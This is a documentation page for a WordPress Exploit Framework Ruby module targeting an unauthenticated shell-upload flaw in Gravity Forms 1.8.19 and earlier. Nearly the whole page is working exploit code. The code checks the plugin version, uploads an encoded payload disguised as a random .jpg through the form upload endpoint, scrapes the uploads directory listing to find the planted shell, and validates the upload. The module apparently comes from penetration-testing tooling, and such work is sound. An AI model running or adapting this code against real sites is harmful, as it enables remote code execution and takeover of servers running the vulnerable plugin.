class Wpxf::Exploit::GravityFormsV1819ShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/shell/gravity_forms_v1.8.19_shell_upload.rb, line 6
def initialize
  super

  update_info(
    name: 'Gravity Forms <= 1.8.19 Unauthenticated Shell Upload',
    author: [
      'Sucuri.net', # Discovery and disclosure
      'rastating'   # WPXF module
    ],
    references: [
      ['WPVDB', '7820']
    ],
    date: 'Dec 08 2014'
  )

  register_option(
    IntegerOption.new(
      name: 'form_id',
      desc: 'A valid Gravity Forms form ID',
      default: 1,
      required: true
    )
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/shell/gravity_forms_v1.8.19_shell_upload.rb, line 31
def check
  changelog = normalize_uri(wordpress_url_plugins, 'gravityforms', 'change_log.txt')
  check_version_from_custom_file(changelog, /Version\s+(\d+\.\d+(\.\d+)*)/, '1.8.20')
end
form_id() click to toggle source
# File lib/wpxf/modules/exploit/shell/gravity_forms_v1.8.19_shell_upload.rb, line 36
def form_id
  normalized_option_value('form_id')
end
payload_body_builder() click to toggle source
# File lib/wpxf/modules/exploit/shell/gravity_forms_v1.8.19_shell_upload.rb, line 51
def payload_body_builder
  builder = Utility::BodyBuilder.new
  builder.add_field('name', payload_name)
  builder.add_field('field_id', 1)
  builder.add_file_from_string('file', payload.encoded, "#{Utility::Text.rand_alpha(5)}.jpg")
  builder
end
scrape_upload_folder() click to toggle source
# File lib/wpxf/modules/exploit/shell/gravity_forms_v1.8.19_shell_upload.rb, line 59
def scrape_upload_folder
  emit_info 'Scraping target for the upload location...'
  uploads_url = normalize_uri(wordpress_url_uploads, 'gravity_forms')
  res = execute_get_request(url: uploads_url)

  unless res && res.code == 200
    emit_error 'The target appears to have directory listing disabled'
    emit_error "Code: #{res.code}", true
    return nil
  end

  name = res.body[/href="(#{form_id}\-[a-z0-9\/]+?)"/i, 1]
  emit_success "Found directory: #{name}"
  name
end
upload_request_params() click to toggle source
# File lib/wpxf/modules/exploit/shell/gravity_forms_v1.8.19_shell_upload.rb, line 44
def upload_request_params
  {
    'gf_page' => 'upload',
    'form_id' => form_id
  }
end
uploaded_payload_location() click to toggle source
# File lib/wpxf/modules/exploit/shell/gravity_forms_v1.8.19_shell_upload.rb, line 87
def uploaded_payload_location
  directory = scrape_upload_folder
  return false unless directory
  normalize_uri(wordpress_url_uploads, 'gravity_forms', directory, 'tmp', "_input_#{form_id}_#{payload_name}")
end
uploader_url() click to toggle source
# File lib/wpxf/modules/exploit/shell/gravity_forms_v1.8.19_shell_upload.rb, line 40
def uploader_url
  full_uri
end
validate_upload_result() click to toggle source
# File lib/wpxf/modules/exploit/shell/gravity_forms_v1.8.19_shell_upload.rb, line 75
def validate_upload_result
  return false unless upload_result && upload_result.code == 200
  res = JSON.parse(upload_result.body)

  if res['status'] == 'error'
    emit_error "Upload failed: #{res['error']['message']}"
    return false
  end

  true
end